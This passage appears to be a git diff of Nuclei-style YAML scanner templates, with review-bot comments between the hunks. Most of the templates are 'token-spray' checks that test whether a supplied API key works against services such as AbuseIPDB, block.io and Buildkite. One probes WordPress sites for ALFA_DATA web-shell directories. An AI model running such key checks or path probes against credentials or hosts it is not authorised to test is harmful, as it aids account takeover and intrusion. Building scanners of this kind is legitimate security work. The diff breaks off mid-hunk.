@@ -1,32 +1,30 @@ -id: alfacgiapi-wordpress - -info: - name: alfacgiapi - author: pussycat0x - severity: low - description: Searches for sensitive directories present in the ALFA_DATA. - reference: https://www.exploit-db.com/ghdb/6999 - tags: wordpress,listing - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-includes/ALFA_DATA/" - - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - type: word - words: - - "/wp-content/plugins/" - - "/wp-includes/ALFA_DATA/" - - "/ALFA_DATA/alfacgiapi/" - - "/cgi-bin/ALFA_DATA/alfacgiapi/" - condition: or - - type: status - status: - - 200 +id: alfacgiapi-wordpress +info: + name: alfacgiapi + author: pussycat0x + severity: low + description: Searches for sensitive directories present in the ALFA_DATA. + reference: https://www.exploit-db.com/ghdb/6999 + tags: wordpress,listing +requests: + - method: GET + path: + - "{{BaseURL}}/wp-includes/ALFA_DATA/" + - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" + - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" + - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - type: word + words: + - "/wp-content/plugins/" + - "/wp-includes/ALFA_DATA/" + - "/ALFA_DATA/alfacgiapi/" + - "/cgi-bin/ALFA_DATA/alfacgiapi/" + condition: or + - type: status + status: + - 200 diff --git a/poc/api/alfacgiapi-wordpress.yaml b/poc/api/alfacgiapi-wordpress.yaml deleted file mode 100644 index f8d61143d9..0000000000 --- a/poc/api/alfacgiapi-wordpress.yaml +++ /dev/null 
@@ -1,33 +0,0 @@ -id: alfacgiapi-wordpress - -info: - name: alfacgiapi - author: pussycat0x - severity: low - description: Searches for sensitive directories present in the ALFA_DATA. - reference: https://www.exploit-db.com/ghdb/6999 - tags: wordpress,listing - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-includes/ALFA_DATA/" - - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" - - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - type: word - words: - - "/wp-content/plugins/" - - "/wp-includes/ALFA_DATA/" - - "/ALFA_DATA/alfacgiapi/" - - "/cgi-bin/ALFA_DATA/alfacgiapi/" - condition: or - - type: status - status: - - 200 diff --git a/poc/api/apache-apisix-panel-336.yaml b/poc/api/apache-apisix-panel-336.yaml index 2c6124e710..dbd94dc5bf 100644 --- a/poc/api/apache-apisix-panel-336.yaml +++ b/poc/api/apache-apisix-panel-336.yaml @@ -5,11 +5,14 @@ info: author: pikpikcu severity: info description: An Apache APISIX login panel was detected. - classification: - cwe-id: CWE-200 metadata: fofa-query: title="Apache APISIX Dashboard" tags: apache,apisix,panel + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 requests: - method: GET diff --git a/poc/api/apache-apisix-panel-337.yaml b/poc/api/apache-apisix-panel-337.yaml deleted file mode 100644 index 6d3f464a45..0000000000 --- a/poc/api/apache-apisix-panel-337.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: apache-apisix-panel - -info: - name: Apache APISIX Panel detect - author: pikpikcu - severity: info - metadata: - fofa-query: title="Apache APISIX Dashboard" - tags: apache,apisix,panel - -requests: - - method: GET - path: - - "{{BaseURL}}/user/login?redirect=%2F" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Apache APISIX Dashboard' - - - type: status - status: - - 200 
diff --git a/poc/api/apache-apisix-panel-338.yaml b/poc/api/apache-apisix-panel-338.yaml new file mode 100644 index 0000000000..2c6124e710 --- /dev/null +++ b/poc/api/apache-apisix-panel-338.yaml @@ -0,0 +1,30 @@ +id: apache-apisix-panel + +info: + name: Apache APISIX Login Panel + author: pikpikcu + severity: info + description: An Apache APISIX login panel was detected. + classification: + cwe-id: CWE-200 + metadata: + fofa-query: title="Apache APISIX Dashboard" + tags: apache,apisix,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/user/login?redirect=%2F" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Apache APISIX Dashboard' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/16 diff --git a/poc/api/api-abstractapi-383.yaml b/poc/api/api-abstractapi-383.yaml new file mode 100644 index 0000000000..d817d4faeb --- /dev/null +++ b/poc/api/api-abstractapi-383.yaml @@ -0,0 +1,25 @@ +id: api-abstractapi + +info: + name: Abstract Api Public Holidays Test + author: daffainfo + severity: info + reference: + - https://www.abstractapi.com/holidays-api + - https://github.com/daffainfo/all-about-apikey/blob/main/Calendar/Abstract%20Public%20Holidays.md + tags: token-spray,abstractapi + +self-contained: true +requests: + - method: GET + path: + - "https://holidays.abstractapi.com/v1/?api_key={{token}}&country=GB&year=2021&month=1&day=25" + + matchers: + - type: word + part: body + words: + - '"name_local":' + - '"location":' + - '"date_year":' + condition: and diff --git a/poc/api/api-abuseipdb-384.yaml b/poc/api/api-abuseipdb-385.yaml similarity index 100% rename from poc/api/api-abuseipdb-384.yaml rename to poc/api/api-abuseipdb-385.yaml diff --git a/poc/api/api-abuseipdb.yaml b/poc/api/api-abuseipdb.yaml new file mode 100644 index 0000000000..ca83d86700 --- /dev/null +++ b/poc/api/api-abuseipdb.yaml 
@@ -0,0 +1,31 @@ +id: api-abuseipdb + +info: + name: AbuseIPDB API Test + author: daffainfo + severity: info + reference: + - https://docs.abuseipdb.com/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AbuseIPDB.md + tags: token-spray,abuseipdb + +self-contained: true +requests: + - raw: + - | + POST https://api.abuseipdb.com/api/v2/report HTTP/1.1 + Host: api.abuseipdb.com + Key: {{token}} + Accept: application/json + Content-Type: application/x-www-form-urlencoded + Content-Length: 16 + + ip=127.0.0.1&categories=18,22&comment=SSH%20login%20attempts%20with%20user%20root. + + matchers: + - type: word + part: body + words: + - 'data":' + - 'ipAddress":' + condition: and diff --git a/poc/api/api-accuweather-386.yaml b/poc/api/api-accuweather-386.yaml deleted file mode 100644 index 0bc6282dc2..0000000000 --- a/poc/api/api-accuweather-386.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: api-accuweather - -info: - name: AccuWeather API Test - author: zzeitlin - severity: info - reference: - - https://developer.accuweather.com/apis - metadata: - max-request: 1 - tags: token-spray,accuweather - -self-contained: true - -http: - - method: GET - path: - - "http://api.accuweather.com/locations/v1/search?language=en-US&apikey={{token}}&q=Athens,%20Greece" - - matchers: - - type: word - part: body - words: - - '"Version"' - - '"LocalizedName"' - - '"DataSets"' - condition: and - -# digest: 4b0a00483046022100d00f2152465c3858fe0b7b03fc3e88fbac6b919525f6c0b1c028a09a0ded9c48022100a0781fe50668fe64cea809f8616d799bd7d6b219e9e1bc4dbb2522f5e33b40df:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-accuweather.yaml b/poc/api/api-accuweather.yaml new file mode 100644 index 0000000000..8c1c526443 --- /dev/null +++ b/poc/api/api-accuweather.yaml 
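Review bot: The token check in api-abuseipdb.yaml is a `POST` to `/api/v2/report`, so every key that validates also files a real abuse report (for `127.0.0.1`) under that key's account, and the hard-coded `Content-Length: 16` is far shorter than the form body that follows, so the server may read a truncated body. A key check should have no side effects: use a read-only endpoint of the same API (its `check` endpoint appears suitable, to be confirmed against the referenced docs) and remove the fixed `Content-Length` line so the engine computes it. The matcher words `'data":'` and `'ipAddress":'` can stay if the replacement response contains them.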
@@ -0,0 +1,23 @@ +id: api-accuweather + +info: + name: AccuWeather API Test + author: zzeitlin + severity: info + reference: https://developer.accuweather.com/apis + tags: token-spray,accuweather + +self-contained: true +requests: + - method: GET + path: + - "http://api.accuweather.com/locations/v1/search?language=en-US&apikey={{token}}&q=Athens,%20Greece" + + matchers: + - type: word + part: body + words: + - '"Version"' + - '"LocalizedName"' + - '"DataSets"' + condition: and diff --git a/poc/api/api-adafruit-io-387.yaml b/poc/api/api-adafruit-io-387.yaml deleted file mode 100644 index 87985ad5a3..0000000000 --- a/poc/api/api-adafruit-io-387.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: api-adafruit-io - -info: - name: Adafruit IO API Test - author: dwisiswant0 - severity: info - reference: - - https://io.adafruit.com/api/docs/ - metadata: - max-request: 1 - tags: token-spray,adafruit - -self-contained: true - -http: - - method: GET - path: - - "https://io.adafruit.com/api/v2/user" - - headers: - X-AIO-Key: "{{token}}" - matchers: - - type: word - part: body - words: - - '"username":' - - '"id":' - condition: and - -# digest: 4a0a00473045022100bd2cde5742fc5e144ec6165cbc4dac66a0c51f4c574e845586f7ad8a47b196cb02206243f827c0ea95f3c051255499e838a938ac1a03275a636a90746a583327cd9e:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-adafruit-io.yaml b/poc/api/api-adafruit-io.yaml new file mode 100644 index 0000000000..5fc0e8d40c --- /dev/null +++ b/poc/api/api-adafruit-io.yaml @@ -0,0 +1,24 @@ +id: api-adafruit-io + +info: + name: Adafruit IO API Test + author: dwisiswant0 + severity: info + reference: https://io.adafruit.com/api/docs/ + tags: token-spray,adafruit + +self-contained: true +requests: + - method: GET + path: + - "https://io.adafruit.com/api/v2/user" + headers: + X-AIO-Key: "{{token}}" + + matchers: + - type: word + part: body + words: + - '"username":' + - '"id":' + condition: and \ No newline at end of file 
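Review bot: The request path in `api-accuweather.yaml` uses `http://api.accuweather.com/...`, so the key under test travels in the query string over cleartext and is readable by anything on the network path. Use the TLS endpoint instead, `- "https://api.accuweather.com/locations/v1/search?language=en-US&apikey={{token}}&q=Athens,%20Greece"`, after confirming the host serves HTTPS. The removed `api-accuweather-386.yaml` had the same URL, so this is carried over rather than introduced here.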
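Review bot: The added `api-adafruit-io.yaml` replaces a signed template with an unsigned one: the removed `api-adafruit-io-387.yaml` used the `http:` key and ended with a `# digest:` trailer, while the new file uses the older `requests:` key and carries no digest. Without the trailer, a scanner that verifies template signatures cannot tell whether the file was altered after it was published. The same swap is visible in this patch for api-accuweather, api-apigee-edge, api-appveyor, api-block, api-coinapi, api-debounce, api-fullhunt and api-hirak-rates. Keeping the signed copy, or re-signing after import, would preserve that integrity check.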
diff --git a/poc/api/api-alienvault-388.yaml b/poc/api/api-alienvault-388.yaml deleted file mode 100644 index 11968b6017..0000000000 --- a/poc/api/api-alienvault-388.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: api-alienvault - -info: - name: AlienVault Open Threat Exchange (OTX) API Test - author: daffainfo - severity: info - description: IP/domain/URL reputation - reference: - - https://otx.alienvault.com/api - - https://github.com/daffainfo/all-about-apikey/tree/main/alienvault-open-threat-exchange - metadata: - max-request: 1 - tags: token-spray,alienvault,exchange - -self-contained: true - -http: - - raw: - - | - GET https://otx.alienvault.com/api/v1/pulses/subscribed?page=1 HTTP/1.1 - Host: otx.alienvault.com - X-OTX-API-KEY: {{token}} - - matchers: - - type: word - part: body - words: - - '"$schema":' - - '"properties":' - condition: and - -# digest: 4b0a00483046022100cfb8a99e6ad24ec70c2e69bf9d67d642aef36f843015c70845938d97ff80c96a022100a44d8300cbd0db289a5e51a128ecd43ae20a9d4960a6632ab18ca6bcbb0192e7:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-apigee-edge-391.yaml b/poc/api/api-apigee-edge-391.yaml deleted file mode 100644 index e2d7fba259..0000000000 --- a/poc/api/api-apigee-edge-391.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: api-apigee-edge - -info: - name: Apigee Edge API Test - author: dwisiswant0 - severity: info - reference: - - https://apidocs.apigee.com/apis - metadata: - max-request: 1 - tags: token-spray,apigee - -self-contained: true - -http: - - method: GET - path: - - "https://apimonitoring.enterprise.apigee.com/alerts" - - headers: - Authorization: Bearer {{token}} - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - '"uuid":' - - '"name":' - condition: and - -# digest: 4a0a00473045022100e845a1ceb69b8a5d6c312ad52ccdbed0e07b6bca2d1cbef0354f9c9f46b486a702203ef383498432551eb9091e1ec2acab8f8a0979e1a66312addc036e38e9de000f:922c64590222798bb761d5b6d8e72950 
diff --git a/poc/api/api-apigee-edge.yaml b/poc/api/api-apigee-edge.yaml new file mode 100644 index 0000000000..e724933ea0 --- /dev/null +++ b/poc/api/api-apigee-edge.yaml @@ -0,0 +1,29 @@ +id: api-apigee-edge + +info: + name: Apigee Edge API Test + author: dwisiswant0 + severity: info + reference: https://apidocs.apigee.com/apis + tags: token-spray,apigee + +self-contained: true +requests: + - method: GET + path: + - "https://apimonitoring.enterprise.apigee.com/alerts" + headers: + Authorization: Bearer {{token}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - '"uuid":' + - '"name":' + condition: and diff --git a/poc/api/api-appveyor-392.yaml b/poc/api/api-appveyor-392.yaml deleted file mode 100644 index d868abd588..0000000000 --- a/poc/api/api-appveyor-392.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: api-appveyor - -info: - name: AppVeyor API Test - author: dwisiswant0 - severity: info - reference: - - https://www.appveyor.com/docs/api/ - metadata: - max-request: 1 - tags: token-spray,appveyor - -self-contained: true - -http: - - method: GET - path: - - "https://ci.appveyor.com/api/roles" - - headers: - Content-Type: application/json - Authorization: Bearer {{token}} - matchers: - - type: word - part: body - words: - - '"roleId":' - - '"created":' - condition: and - -# digest: 490a00463044022015e6f1f344553fca9c4d1692f24a0f16dfd25d843ca49e5e964b62de347863e9022059f1676f4a19b82033665201e9ba232546dc2321a3469bad64e04a80191e5af2:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-appveyor.yaml b/poc/api/api-appveyor.yaml new file mode 100644 index 0000000000..25bac0e370 --- /dev/null +++ b/poc/api/api-appveyor.yaml 
@@ -0,0 +1,25 @@
+id: api-appveyor
+
+info:
+ name: AppVeyor API Test
+ author: dwisiswant0
+ severity: info
+ reference: https://www.appveyor.com/docs/api/
+ tags: token-spray,appveyor
+
+self-contained: true
+requests:
+ - method: GET
+ path:
+ - "https://ci.appveyor.com/api/roles"
+ headers:
+ Content-Type: application/json
+ Authorization: Bearer {{token}}
+
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"roleId":'
+ - '"created":'
+ condition: and
\ No newline at end of file
diff --git a/poc/api/api-bible-394.yaml b/poc/api/api-bible-394.yaml
new file mode 100644
index 0000000000..ec2ef5312e
--- /dev/null
+++ b/poc/api/api-bible-394.yaml
@@ -0,0 +1,33 @@
+id: api-bible
+
+info:
+ name: API.Bible API Test
+ author: daffainfo
+ severity: info
+ description: Everything you need from the Bible in one discoverable place
+ reference:
+ - https://docs.api.bible
+ - https://github.com/daffainfo/all-about-apikey/tree/main/api-bible
+ metadata:
+ max-request: 1
+ tags: token-spray,bible
+
+self-contained: true
+
+http:
+ - method: GET
+ path:
+ - "https://api.scripture.api.bible/v1/bibles/a6aee10bb058511c-02/verses/JHN.3.16?fums-version=3"
+
+ headers:
+ api-key: "{{token}}"
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "orgId"
+ - "bookId"
+ - "bibleId"
+ condition: and
+
+# digest: 490a0046304402205e87cb73c18cb16749114c71928bdcb3974dc3659aff91db8102895523a33d9302207d38e6dc9f9c0d024c71725322f44ce3846c31765ead4b26b9ae4ffe5c1ac3d8:922c64590222798bb761d5b6d8e72950
diff --git a/poc/api/api-bible.yaml b/poc/api/api-bible.yaml
deleted file mode 100644
index 9e47277d90..0000000000
--- a/poc/api/api-bible.yaml
+++ /dev/null
@@ -1,28 +0,0 @@ -id: api-bible - -info: - name: API.Bible API Test - author: daffainfo - severity: info - description: Everything you need from the Bible in one discoverable place - reference: - - https://docs.api.bible - - https://github.com/daffainfo/all-about-apikey/tree/main/api-bible - tags: token-spray,bible - -self-contained: true -requests: - - method: GET - path: - - "https://api.scripture.api.bible/v1/bibles/a6aee10bb058511c-02/verses/JHN.3.16?fums-version=3" - headers: - api-key: "{{token}}" - - matchers: - - type: word - part: body - words: - - "orgId" - - "bookId" - - "bibleId" - condition: and diff --git a/poc/api/api-bingmaps.yaml b/poc/api/api-bingmaps.yaml deleted file mode 100644 index 0892d85b9f..0000000000 --- a/poc/api/api-bingmaps.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: api-bingmaps - -info: - name: Bing Maps API Test - author: zzeitlin - reference: https://docs.microsoft.com/en-us/bingmaps/rest-services/locations/find-a-location-by-address - severity: info - tags: token-spray,bing,maps,bingmaps - -requests: - - method: GET - path: - - "https://dev.virtualearth.net/REST/v1/Locations?CountryRegion=US&adminDistrict=WA&locality=Somewhere&postalCode=98001&addressLine=100%20Main%20St.&key={{token}}" - - matchers: - - type: word - part: body - words: - - 'ValidCredentials' diff --git a/poc/api/api-bitly-396.yaml b/poc/api/api-bitly-396.yaml index 2d348aee2d..0a4c307e15 100644 --- a/poc/api/api-bitly-396.yaml +++ b/poc/api/api-bitly-396.yaml @@ -2,17 +2,13 @@ id: api-bitly info: name: Bitly API Test - author: zzeitlin,geeknik + author: zzeitlin + reference: https://dev.bitly.com/api-reference severity: info - reference: - - https://dev.bitly.com/api-reference - metadata: - max-request: 1 tags: token-spray,bitly self-contained: true - -http: +requests: - method: GET path: - "https://api-ssl.bitly.com/v3/shorten?access_token={{token}}&longUrl=https://www.google.com" 
@@ -21,7 +17,6 @@ http: - type: word part: body words: - - '"status_code":200,"status_txt":"OK"' - condition: and - -# digest: 490a0046304402201b2c0fcb9e368924c66fa9fccbaff444d11ce07e5cccfb958ca54963737acf21022022bec99c0126770bf18ce5d4ec3e2f2259d7a9155225394a530a7910bbbf8836:922c64590222798bb761d5b6d8e72950 + - '"long_url":' + - '"created_at":' + condition: and \ No newline at end of file diff --git a/poc/api/api-bitrise-397.yaml b/poc/api/api-bitrise-397.yaml new file mode 100644 index 0000000000..96ca399331 --- /dev/null +++ b/poc/api/api-bitrise-397.yaml @@ -0,0 +1,33 @@ +id: api-bitrise + +info: + name: Bitrise API Test + author: daffainfo + severity: info + description: Build tool and processes integrations to create efficient development pipelines + reference: + - https://api-docs.bitrise.io/ + - https://github.com/daffainfo/all-about-apikey/tree/main/bitrise + metadata: + max-request: 1 + tags: token-spray,bitrise + +self-contained: true + +http: + - raw: + - | + GET https://api.bitrise.io/v0.1/me HTTP/1.1 + Host: api.bitrise.io + Authorization: {{token}} + + matchers: + - type: word + part: body + words: + - '"username":' + - '"slug":' + - '"email":' + condition: and + +# digest: 4a0a0047304502203371c051bd3399996cc566f5864a6e016a56f383c0ced061c17e85d1117ab252022100d976865824087f7c211f9213a1452a87ad07e2b5aae257c8872a9e00ddd7bdda:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-bitrise.yaml b/poc/api/api-bitrise.yaml deleted file mode 100644 index 2d05c3282d..0000000000 --- a/poc/api/api-bitrise.yaml +++ /dev/null 
@@ -1,28 +0,0 @@ -id: api-bitrise - -info: - name: Bitrise API Test - author: daffainfo - severity: info - description: Build tool and processes integrations to create efficient development pipelines - reference: - - https://api-docs.bitrise.io/ - - https://github.com/daffainfo/all-about-apikey/tree/main/bitrise - tags: token-spray,bitrise - -self-contained: true -requests: - - raw: - - | - GET https://api.bitrise.io/v0.1/me HTTP/1.1 - Host: api.bitrise.io - Authorization: {{token}} - - matchers: - - type: word - part: body - words: - - '"username":' - - '"slug":' - - '"email":' - condition: and diff --git a/poc/api/api-block-400.yaml b/poc/api/api-block-400.yaml deleted file mode 100644 index 2fc7dfe928..0000000000 --- a/poc/api/api-block-400.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: api-block - -info: - name: block.io API Test - author: daffainfo - severity: info - description: Bitcoin Payment, Wallet & Transaction Data - reference: - - https://block.io/docs/basic - - https://github.com/daffainfo/all-about-apikey/tree/main/block - metadata: - max-request: 1 - tags: token-spray,block - -self-contained: true - -http: - - method: GET - path: - - "https://block.io/api/v2/get_balance/?api_key={{token}}" - - matchers: - - type: word - part: body - words: - - '"network"' - - '"available_balance"' - - '"pending_received_balance"' - condition: and - -# digest: 4b0a00483046022100fd81e0c16388146cbd2b450d6118a86ae188f23abff1b84fd08cdafc4d7638b1022100ba0a85f74493861f7ddbeb5e5f11a6ffc1a597ffc5da016918e2f8dcb099110c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-block.yaml b/poc/api/api-block.yaml new file mode 100644 index 0000000000..616a67dd9f --- /dev/null +++ b/poc/api/api-block.yaml 
@@ -0,0 +1,26 @@ +id: api-block + +info: + name: block.io API Test + author: daffainfo + severity: info + description: Bitcoin Payment, Wallet & Transaction Data + reference: + - https://block.io/docs/basic + - https://github.com/daffainfo/all-about-apikey/tree/main/block + tags: token-spray,block + +self-contained: true +requests: + - method: GET + path: + - "https://block.io/api/v2/get_balance/?api_key={{token}}" + + matchers: + - type: word + part: body + words: + - '"network"' + - '"available_balance"' + - '"pending_received_balance"' + condition: and diff --git a/poc/api/api-blockchain-399.yaml b/poc/api/api-blockchain-399.yaml index afa9207f6c..4f027d84d3 100644 --- a/poc/api/api-blockchain-399.yaml +++ b/poc/api/api-blockchain-399.yaml @@ -1,17 +1,13 @@ id: api-blockchain info: - name: Blockchain API Test + name: Blockhain API Test author: daffainfo severity: info reference: - https://api.blockchain.com/v3/#/ - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Blockchain.md tags: token-spray,blockchain - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 self-contained: true requests: @@ -29,5 +25,3 @@ requests: - '"balance"' - '"available"' condition: and - -# Enhanced by cs on 2022/02/28 diff --git a/poc/api/api-blockchain.yaml b/poc/api/api-blockchain.yaml deleted file mode 100644 index 4f027d84d3..0000000000 --- a/poc/api/api-blockchain.yaml +++ /dev/null 
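Review bot: The first hunk of `api-blockchain-399.yaml` changes the display name to `Blockhain API Test`, reintroducing a typo that the previous revision had corrected; the name is what shows up in scan reports, so it should stay `name: Blockchain API Test`. The same hunk also drops the `classification` block (`cwe-id: CWE-200` and the CVSS fields), which is the metadata a triage pipeline would group this result by. Keep that block unless its removal is intentional.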
@@ -1,27 +0,0 @@ -id: api-blockchain - -info: - name: Blockhain API Test - author: daffainfo - severity: info - reference: - - https://api.blockchain.com/v3/#/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Blockchain.md - tags: token-spray,blockchain - -self-contained: true -requests: - - raw: - - | - GET https://api.blockchain.com/v3/exchange/accounts HTTP/1.1 - Host: api.blockchain.com - X-API-Token: {{token}} - - matchers: - - type: word - part: body - words: - - '"currency"' - - '"balance"' - - '"available"' - condition: and diff --git a/poc/api/api-buildkite-402.yaml b/poc/api/api-buildkite-402.yaml index 7855f0b53b..39176ab3fb 100644 --- a/poc/api/api-buildkite-402.yaml +++ b/poc/api/api-buildkite-402.yaml @@ -3,18 +3,22 @@ id: api-buildkite info: name: Buildkite API Test author: zzeitlin - reference: https://buildkite.com/docs/apis/rest-api/user severity: info + reference: + - https://buildkite.com/docs/apis/rest-api/user + metadata: + max-request: 1 tags: token-spray,buildkite self-contained: true -requests: + +http: - method: GET path: - "https://api.buildkite.com/v2/user" + headers: Authorization: Bearer {{token}} - matchers: - type: word part: body @@ -22,4 +26,6 @@ requests: - '"id":' - '"graphql_id":' - '"email":' - condition: and \ No newline at end of file + condition: and + +# digest: 4a0a00473045022100b1e9462eb31a19937ecf593969002cadf169b17731937fb41f262e095067f02002206a2f5621877513735651c7cd41a13fec9c9d4e140adf8f696d5cda2dde328510:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-buildkite.yaml b/poc/api/api-buildkite.yaml deleted file mode 100644 index 77e8e1e677..0000000000 --- a/poc/api/api-buildkite.yaml +++ /dev/null 
@@ -1,21 +0,0 @@ -id: api-buildkite - -info: - name: Buildkite API Test - author: zzeitlin - reference: https://buildkite.com/docs/apis/rest-api/user - severity: info - tags: token-spray,buildkite - -requests: - - method: GET - path: - - "https://api.buildkite.com/v2/user" - headers: - Authorization: Bearer {{token}} - - matchers: - - type: status - status: - - 401 - negative: true diff --git a/poc/api/api-buttercms-403.yaml b/poc/api/api-buttercms-403.yaml index 229da7b1d5..13e2bf6449 100644 --- a/poc/api/api-buttercms-403.yaml +++ b/poc/api/api-buttercms-403.yaml @@ -3,17 +3,27 @@ id: api-buttercms info: name: ButterCMS API Test author: zzeitlin - reference: https://buttercms.com/docs/api/#introduction severity: info + reference: + - https://buttercms.com/docs/api/#introduction + metadata: + max-request: 1 tags: token-spray,buttercms -requests: +self-contained: true + +http: - method: GET path: - "https://api.buttercms.com/v2/posts/?auth_token={{token}}" matchers: - - type: status - status: - - 401 - negative: true + - type: word + part: body + words: + - '"meta":' + - '"data":' + - '"url":' + condition: and + +# digest: 4a0a0047304502204dc8c9796e535808254d0eb5626dc45c1b06b31a8bf085440a59efa7dfdf7abc022100e54314942e38c520cc860c0fdb63002f2bb74bca1f4ff487cbc2d9c6e5a0e6a0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-calendly-404.yaml b/poc/api/api-calendly-404.yaml index 0d511e01ec..10a8e83478 100644 --- a/poc/api/api-calendly-404.yaml +++ b/poc/api/api-calendly-404.yaml 
@@ -3,22 +3,18 @@ id: api-calendly info: name: Calendly API Test author: zzeitlin + reference: https://calendly.stoplight.io/docs/api-docs-v1/b3A6MTg3MDczNg-about-me severity: info - reference: - - https://calendly.stoplight.io/docs/api-docs-v1/b3A6MTg3MDczNg-about-me - metadata: - max-request: 1 tags: token-spray,calendly self-contained: true - -http: +requests: - method: GET path: - "https://calendly.com/api/v1/users/me" - headers: X-Token: "{{token}}" + matchers: - type: word part: body @@ -26,6 +22,4 @@ http: - '"data":' - '"id":' - '"email":' - condition: and - -# digest: 4a0a00473045022100e831b694f92daa23cba4637646ee6eb40171e699067710e865d8666f3bcaa2e002205a5e6d92632f7ea24402afe34c8d87f6cfede195fe217b87725a477ecdab0819:922c64590222798bb761d5b6d8e72950 + condition: and \ No newline at end of file diff --git a/poc/api/api-circleci-406.yaml b/poc/api/api-circleci-406.yaml index b01e427381..281d22b656 100644 --- a/poc/api/api-circleci-406.yaml +++ b/poc/api/api-circleci-406.yaml @@ -5,18 +5,14 @@ info: author: zzeitlin reference: https://circleci.com/docs/api/v1 severity: info - tags: token-spray,circleci + tags: token-spray,circle,circleci -self-contained: true requests: - method: GET path: - "https://circleci.com/api/v1.1/me?circle-token={{token}}" matchers: - - type: word - part: body - words: - - '"admin"' - - '"login"' - condition: and + - type: status + status: + - 200 diff --git a/poc/api/api-circleci.yaml b/poc/api/api-circleci.yaml deleted file mode 100644 index 281d22b656..0000000000 --- a/poc/api/api-circleci.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: api-circleci - -info: - name: CircleCI API Test - author: zzeitlin - reference: https://circleci.com/docs/api/v1 - severity: info - tags: token-spray,circle,circleci - -requests: - - method: GET - path: - - "https://circleci.com/api/v1.1/me?circle-token={{token}}" - - matchers: - - type: status - status: - - 200 
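Review bot: The matcher in `api-circleci-406.yaml` is reduced to `status: 200`, so any 200 response, such as a proxy interstitial or an error page served with 200, is reported as a valid key; the removed body check on `'"admin"'` and `'"login"'` tied the result to an actual account response. The hunk also deletes `self-contained: true` although the path is still an absolute URL with no `{{BaseURL}}`, which presumably makes the scanner repeat the same token request once per target and attribute the hit to an unrelated host. Restore both: `self-contained: true` and the `type: word` body matcher with `condition: and`. `api-dropbox-418.yaml` shows the same two regressions, and `api-cooperhewitt-411.yaml` the matcher one.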
diff --git a/poc/api/api-coinapi-408.yaml b/poc/api/api-coinapi-408.yaml deleted file mode 100644 index f4285dd83b..0000000000 --- a/poc/api/api-coinapi-408.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: api-coinapi - -info: - name: CoinAPI API Test - author: daffainfo - severity: info - description: All Currency Exchanges integrate under a single api - reference: - - https://docs.coinapi.io/ - - https://github.com/daffainfo/all-about-apikey/tree/main/coinapi - metadata: - max-request: 1 - tags: token-spray,coinapi - -self-contained: true - -http: - - raw: - - | - GET https://rest.coinapi.io/v1/exchanges HTTP/1.1 - Host: rest.coinapi.io - X-CoinAPI-Key: {{token}} - - matchers: - - type: word - part: body - words: - - '"exchange_id":' - - '"website":' - - '"name":' - condition: and - -# digest: 4b0a00483046022100a574100efec77cf185d51fc83943f788217c9e1ad8e7a40c0180da3559fb1bb9022100fc3450c1ba3a0494de47b64ec3f0d6da00d95a293b5d7a8f1f804c6668a9d31a:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-coinapi.yaml b/poc/api/api-coinapi.yaml new file mode 100644 index 0000000000..e4a2e44374 --- /dev/null +++ b/poc/api/api-coinapi.yaml @@ -0,0 +1,28 @@ +id: api-coinapi + +info: + name: CoinAPI API Test + author: daffainfo + severity: info + description: All Currency Exchanges integrate under a single api + reference: + - https://docs.coinapi.io/ + - https://github.com/daffainfo/all-about-apikey/tree/main/coinapi + tags: token-spray,coinapi + +self-contained: true +requests: + - raw: + - | + GET https://rest.coinapi.io/v1/exchanges HTTP/1.1 + Host: rest.coinapi.io + X-CoinAPI-Key: {{token}} + + matchers: + - type: word + part: body + words: + - '"exchange_id":' + - '"website":' + - '"name":' + condition: and diff --git a/poc/api/api-cooperhewitt-411.yaml b/poc/api/api-cooperhewitt-411.yaml index 0da30b58ee..c54d64e093 100644 --- 